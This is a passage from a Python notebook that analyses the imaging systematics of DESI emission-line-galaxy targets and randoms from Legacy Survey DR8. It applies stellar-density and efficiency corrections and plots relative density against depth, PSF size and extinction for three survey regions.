2**bit)==0)\nprint(len(rall[keepelg]))\nrelg = rall[keepelg]", "67762950\n64567641\n" ], [ "print(rall_header)\n#write out randoms\n#fitsio.write(os.getenv('SCRATCH')+'/ELGrandoms.fits',relg,overwrite=True)", "\nXTENSION= 'BINTABLE' / binary table extension\nBITPIX = 8 / 8-bit bytes\nNAXIS = 2 / 2-dimensional binary table\nNAXIS1 = 115 / width of table in bytes\nNAXIS2 = 508311875 / number of rows in table\nPCOUNT = 0 / size of special data area\nGCOUNT = 1 / one data group (required keyword)\nTFIELDS = 29 / number of fields in each row\nTTYPE1 = 'RA' / label for field 1\nTFORM1 = 'D' / data format of field: 8-byte DOUBLE\nTTYPE2 = 'DEC' / label for field 2\nTFORM2 = 'D' / data format of field: 8-byte DOUBLE\nTTYPE3 = 'BRICKNAME' / label for field 3\nTFORM3 = '8A' / data format of field: ASCII 
Character\nTTYPE4 = 'NOBS_G' / label for field 4\nTFORM4 = 'I' / data format of field: 2-byte INTEGER\nTTYPE5 = 'NOBS_R' / label for field 5\nTFORM5 = 'I' / data format of field: 2-byte INTEGER\nTTYPE6 = 'NOBS_Z' / label for field 6\nTFORM6 = 'I' / data format of field: 2-byte INTEGER\nTTYPE7 = 'PSFDEPTH_G' / label for field 7\nTFORM7 = 'E' / data format of field: 4-byte REAL\nTTYPE8 = 'PSFDEPTH_R' / label for field 8\nTFORM8 = 'E' / data format of field: 4-byte REAL\nTTYPE9 = 'PSFDEPTH_Z' / label for field 9\nTFORM9 = 'E' / data format of field: 4-byte REAL\nTTYPE10 = 'GALDEPTH_G' / label for field 10\nTFORM10 = 'E' / data format of field: 4-byte REAL\nTTYPE11 = 'GALDEPTH_R' / label for field 11\nTFORM11 = 'E' / data format of field: 4-byte REAL\nTTYPE12 = 'GALDEPTH_Z' / label for field 12\nTFORM12 = 'E' / data format of field: 4-byte REAL\nTTYPE13 = 'PSFDEPTH_W1' / label for field 13\nTFORM13 = 'E' / data format of field: 4-byte REAL\nTTYPE14 = 'PSFDEPTH_W2' / label for field 14\nTFORM14 = 'E' / data format of field: 4-byte REAL\nTTYPE15 = 'PSFSIZE_G' / label for field 15\nTFORM15 = 'E' / data format of field: 4-byte REAL\nTTYPE16 = 'PSFSIZE_R' / label for field 16\nTFORM16 = 'E' / data format of field: 4-byte REAL\nTTYPE17 = 'PSFSIZE_Z' / label for field 17\nTFORM17 = 'E' / data format of field: 4-byte REAL\nTTYPE18 = 'APFLUX_G' / label for field 18\nTFORM18 = 'E' / data format of field: 4-byte REAL\nTTYPE19 = 'APFLUX_R' / label for field 19\nTFORM19 = 'E' / data format of field: 4-byte REAL\nTTYPE20 = 'APFLUX_Z' / label for field 20\nTFORM20 = 'E' / data format of field: 4-byte REAL\nTTYPE21 = 'APFLUX_IVAR_G' / label for field 21\nTFORM21 = 'E' / data format of field: 4-byte REAL\nTTYPE22 = 'APFLUX_IVAR_R' / label for field 22\nTFORM22 = 'E' / data format of field: 4-byte REAL\nTTYPE23 = 'APFLUX_IVAR_Z' / label for field 23\nTFORM23 = 'E' / data format of field: 4-byte REAL\nTTYPE24 = 'MASKBITS' / label for field 24\nTFORM24 = 'I' / data format of field: 2-byte INTEGER\nTTYPE25 = 'WISEMASK_W1' / label for field 25\nTFORM25 = 'B' / data format of field: BYTE\nTTYPE26 = 'WISEMASK_W2' / label for field 26\nTFORM26 = 'B' / data format of field: BYTE\nTTYPE27 = 'EBV' / label for field 27\nTFORM27 = 'E' / data format of field: 4-byte REAL\nTTYPE28 = 'PHOTSYS' / label for field 28\nTFORM28 = '1A' / data format of field: ASCII Character\nTTYPE29 = 'HPXPIXEL' / label for field 29\nTFORM29 = 'K' / data format of field: 8-byte INTEGER\nEXTNAME = 'RANDOMS' / name of this binary table extension\nDEPNAM00= 'desitarget' / \nDEPVER00= '0.31.0' / \nDEPNAM01= 'desitarget-git' / \nDEPVER01= '0.31.0' / \nDEPNAM02= 'input-data-release' / \nDEPVER02= '/global/project/projectdirs/cosmo/work/legacysurvey/dr8' / \nDEPNAM03= 'photcat' / \nDEPVER03= 'dr8' / \nHPXNSIDE= 64 / \nHPXNEST = T / \nSUPP = F / \nDENSITY = 25000 / \nAPRAD = 0.75 / \nRESOLVE = T / \n" ], [ "#put randoms into healpix\nrth,rphi = radec2thphi(relg['RA'],relg['DEC'])\nrpix = hp.ang2pix(nside,rth,rphi,nest=nest)", "_____no_output_____" ], [ "#let's define split into bmzls, DECaLS North, DECaLS South (Anand has tools to make distinct DES region as well)\n#one function to do directly, the other just for the indices\n\nprint(np.unique(felg['PHOTSYS']))\n#bmzls = b'N' #if in desi environment\nbmzls = 'N' #if in Python 3; why the difference? 
Maybe version of fitsio?\n\ndef splitcat(cat):\n NN = cat['PHOTSYS'] == bmzls\n d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)\n d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)\n return cat[NN],cat[d1],cat[d2]\n\ndef splitcat_ind(cat):\n NN = cat['PHOTSYS'] == bmzls\n d1 = (cat['PHOTSYS'] != bmzls) & (cat['RA'] < 300) & (cat['RA'] > 100) & (cat['DEC'] > -20)\n d2 = (d1==0) & (NN ==0) & (cat['DEC'] > -30)\n return NN,d1,d2", "['N' 'S']\n" ], [ "#indices for split\ndbml,ddnl,ddsl = splitcat_ind(felg)\nrbml,rdnl,rdsl = splitcat_ind(relg)\nprint(len(felg[dbml]),len(felg[ddnl]),len(felg[ddsl]))", "12726178 14094848 13407623\n" ], [ "#put into full sky maps (probably not necessary but easier to keep straight down the line)\npixlrbm = np.zeros(12*nside*nside)\npixlgbm = np.zeros(12*nside*nside)\npixlrdn = np.zeros(12*nside*nside)\npixlgdn = np.zeros(12*nside*nside)\npixlrds = np.zeros(12*nside*nside)\npixlgds = np.zeros(12*nside*nside)\n\nfor pix in rpix[rbml]:\n pixlrbm[pix] += 1.\nprint('randoms done')\nfor pix in dpix[dbml]:\n pixlgbm[pix] += 1.\n\nfor pix in rpix[rdnl]:\n pixlrdn[pix] += 1.\nprint('randoms done')\nfor pix in dpix[ddnl]:\n pixlgdn[pix] += 1.\n \nfor pix in rpix[rdsl]:\n pixlrds[pix] += 1.\nprint('randoms done')\nfor pix in dpix[ddsl]:\n pixlgds[pix] += 1.\n ", "randoms done\nrandoms done\nrandoms done\n" ], [ "slp = -0.35/4000.\nb = 1.1\nws = 1./(slp*hpq['STARDENS']+b)", "_____no_output_____" ], [ "print(len(pixlgds))", "786432\n" ], [ "def plotvshp(r1,d1,sys,rng,gdzm=20,ebvm=0.15,useMCeff=True,correctstar=False,title='',effac=1.,south=True):\n w = hpq['GALDEPTH_Z'] > gdzm\n w &= hpq['EBV'] < ebvm\n if useMCeff:\n w &= mcl > 0\n if sys != 'gdc' and sys != 'rdc' and sys != 'zdc':\n sm = hpq[w][sys]\n else:\n if sys == 'gdc':\n print('g depth, extinction corrected')\n sm = hpq[w]['GALDEPTH_G']*np.exp(-3.214*hpq[w]['EBV'])\n if sys == 'rdc':\n sm = hpq[w]['GALDEPTH_R']*np.exp(-2.165*hpq[w]['EBV'])\n if sys == 'zdc':\n sm = hpq[w]['GALDEPTH_Z']*np.exp(-1.211*hpq[w]['EBV'])\n ds = np.ones(len(d1))\n if correctstar:\n ds = ws\n dmc = np.ones(len(d1))\n if useMCeff:\n dmc = mcl**effac\n hd1 = np.histogram(sm,weights=d1[w]*ds[w]/dmc[w],range=rng)\n hdnoc = np.histogram(sm,weights=d1[w],bins=hd1[1],range=rng)\n #print(hd1)\n hr1 = np.histogram(sm,weights=r1[w],bins=hd1[1],range=rng)\n #print(hr1)\n xl = []\n for i in range(0,len(hd1[0])):\n xl.append((hd1[1][i]+hd1[1][i+1])/2.)\n plt.errorbar(xl,hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])),np.sqrt(hd1[0])/hr1[0]/(lelg/len(relg)),fmt='ko')\n if useMCeff:\n plt.plot(xl,hdnoc[0]/hr1[0]/(sum(d1[w])/sum(r1[w])),'k--')\n print(hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])))\n #plt.title(str(mp)+reg)\n plt.plot(xl,np.ones(len(xl)),'k:')\n plt.ylabel('relative density')\n plt.xlabel(sys)\n plt.ylim(0.7,1.3)\n plt.title(title)\n plt.show() ", "_____no_output_____" ], [ "title = 'DECaLS South'\neffac=2.\nplotvshp(pixlrds,pixlgds,'STARDENS',(0,0.5e4),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'PSFSIZE_G',(.9,2.5),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'PSFSIZE_Z',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'EBV',(0,0.15),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'gdc',(0,3000),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'rdc',(0,1000),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'zdc',(20,200),title=title,effac=effac)", "[1.00834509 0.99913033 1.00091741 0.98982195 
0.96729787 0.9540792\n 0.98379748 0.9688327 0.90180147 0.85811363]\n" ], [ "title = 'DECaLS North'\neffac=2.\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*hpq['STARDENS']+b)\ncs = True\n\nplotvshp(pixlrdn,pixlgdn,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar='')\nplotvshp(pixlrdn,pixlgdn,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar='')\nplotvshp(pixlrdn,pixlgdn,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrdn,pixlgdn,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)\nplotvshp(pixlrdn,pixlgdn,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrdn,pixlgdn,'gdc',(0,3000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrdn,pixlgdn,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrdn,pixlgdn,'zdc',(20,200),title=title,effac=effac,correctstar=cs)", "[1.04413932 1.01377588 0.95293409 0.91936779 0.87106227 0.83219991\n 0.78996154 0.74278468 0.64426181 0.61386606]\n" ], [ "title = 'BASS/MZLS'\neffac=1.\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*hpq['STARDENS']+b)\ncs = True\n\nplotvshp(pixlrbm,pixlgbm,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar='')\nplotvshp(pixlrbm,pixlgbm,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrbm,pixlgbm,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)\n\nplotvshp(pixlrbm,pixlgbm,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'gdc',(0,2000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'zdc',(20,200),title=title,effac=effac,correctstar=cs)", "[1.03629782 0.99252015 0.95940507 0.9756098 0.97685887 0.98111145\n 0.96777165 0.97545035 0.9563601 1.02609734]\n" ], [ "'''\nBelow here, directly use data/randoms\n'''", "_____no_output_____" ], [ "#Open files with grids for efficiency and define function to interpolate them (to be improved)\ngrids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridsouth.dat').transpose()\n#grids[3] = grids[3]\ngridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridnorth.dat').transpose()\n#print(np.mean(gridn[3]))\n#gridn[3] = gridn[3]/np.mean(gridn[3])\ndef interpeff(gsig,rsig,zsig,south=True):\n md = 0\n xg = 0.15\n #if gsig > xg:\n # gsig = .99*xg\n xr = 0.15\n #if rsig > xr:\n # rsig = 0.99*xr\n xz = 0.4\n #if zsig > xz:\n # zsig = 0.99*xz\n ngp = 30\n if south:\n grid = grids\n else:\n grid = gridn\n i = (ngp*gsig/(xg-md)).astype(int)\n j = (ngp*rsig/(xr-md)).astype(int)\n k = (ngp*zsig/(xz-md)).astype(int)\n ind = (i*ngp**2.+j*ngp+k).astype(int)\n #print(i,j,k,ind)\n #print(grid[0][ind],grid[1][ind],grid[2][ind])\n #print(grid[0][ind-1],grid[1][ind-1],grid[2][ind-1])\n #print(grid[0][ind+1],grid[1][ind+1],grid[2][ind+1])\n return grid[3][ind]\n#print(interpeff([0.0],[0.0],[0.0],south=False)) \n#print(interpeff(0.0,0.0,0.0,south=True))\n#print(0.1/.4)\n#print(0.4/30.)\n#grid[2][0]", "_____no_output_____" ], [ "#Get depth values that match those used for efficiency grids\ndepth_keyword=\"PSFDEPTH\"\nR_G=3.214 # http://legacysurvey.org/dr8/catalogs/#galactic-extinction-coefficients\nR_R=2.165\nR_Z=1.211\n\ngsigmad=1./np.sqrt(felg[depth_keyword+\"_G\"])\nrsigmad=1./np.sqrt(felg[depth_keyword+\"_R\"])\nzsigmad=1./np.sqrt(felg[depth_keyword+\"_Z\"])\ngsig = gsigmad*10**(0.4*R_G*felg[\"EBV\"])\nw = gsig >= 0.15\ngsig[w] = 0.99*0.15\nrsig = rsigmad*10**(0.4*R_R*felg[\"EBV\"])\nw = rsig >= 0.15\nrsig[w] = 0.99*0.15\nzsig = 
zsigmad*10**(0.4*R_Z*felg[\"EBV\"])\nw = zsig >= 0.4\nzsig[w] = 0.99*0.4\n", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:7: RuntimeWarning: divide by zero encountered in true_divide\n import sys\n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:8: RuntimeWarning: divide by zero encountered in true_divide\n \n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:9: RuntimeWarning: divide by zero encountered in true_divide\n if __name__ == '__main__':\n" ], [ "print(min(gsig),max(gsig))\neffsouthl = interpeff(gsig,rsig,zsig,south=True)", "0.011088011 0.14999883\n" ], [ "effnorthl = interpeff(gsig,rsig,zsig,south=False)\nplt.hist(effnorthl,bins=100)\nplt.show()", "_____no_output_____" ], [ "effbm = effnorthl[dbml]\nprint(np.mean(effbm))\neffbm = effbm/np.mean(effbm)\nplt.hist(effbm,bins=100)\nplt.show()", "0.9651708193053623\n" ], [ "effdn = effsouthl[ddnl]\nprint(np.mean(effdn))\neffdn = effdn/np.mean(effdn)\nplt.hist(effdn,bins=100)\nplt.show()\n#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)\n#plt.colorbar()\n#plt.show()\neffds = effsouthl[ddsl]\nprint(np.mean(effds))\neffds = effds/np.mean(effds)\nplt.hist(effds,bins=100)\nplt.show()\n", "1.0254885421358475\n" ], [ "stardensg = np.zeros(len(felg))\nprint(len(felg),len(dpix))\nfor i in range(0,len(dpix)):\n if i%1000000==0 : print(i)\n pix = dpix[i]\n stardensg[i] = hpq['STARDENS'][pix]", "47256516 47256516\n0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n" ], [ "stardensr = np.zeros(len(relg))\nprint(len(relg),len(rpix))\nfor i in range(0,len(rpix)):\n if i%1000000==0 : print(i)\n pix = rpix[i]\n stardensr[i] = hpq['STARDENS'][pix] ", "64567641 64567641\n0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n48000000\n49000000\n50000000\n51000000\n52000000\n53000000\n54000000\n55000000\n56000000\n57000000\n58000000\n59000000\n60000000\n61000000\n62000000\n63000000\n64000000\n" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,2000))\nhr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])\n#no correction\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])\nhrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,3000))\nhr2 = 
np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])\n\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])\nhrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\n#no strong relation with stellar density\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,2000))\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])\n\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])\nhrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hrn3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_G*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,500))\nhr1 = np.histogram(relg[rbml]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rbml]['EBV']),bins=hg1[1])\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),bins=hg1[1])\n", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,1000))\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,1000))\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_R*MWTRANS')\nplt.ylabel('relative 
density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,200))\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,200))\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,200))\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_Z*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(stardensg[dbml],weights=1./effbm,range=(0,5000))\nhgn1 = np.histogram(stardensg[dbml],bins=hg1[1])\nhr1 = np.histogram(stardensr[rbml],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(stardensg[ddnl],weights=1./effdn**2.,range=(0,5000))\nhgn2 = np.histogram(stardensg[ddnl],bins=hg2[1])\nhr2 = np.histogram(stardensr[rdnl],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(stardensg[ddsl],weights=1./effds**2.,range=(0,5000))\nhgn3 = np.histogram(stardensg[ddsl],bins=hg3[1])\nhr3 = np.histogram(stardensr[rdsl],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = 
sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('Stellar Density')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['EBV'],weights=1./effbm*ws,range=(0,0.15))\nhgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1])\nhr1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['EBV'],weights=1./effdn**2.*ws,range=(0,0.15))\nhgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(felg[ddsl]['EBV'],weights=1./effds**2.,range=(0,0.15))\nhgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = 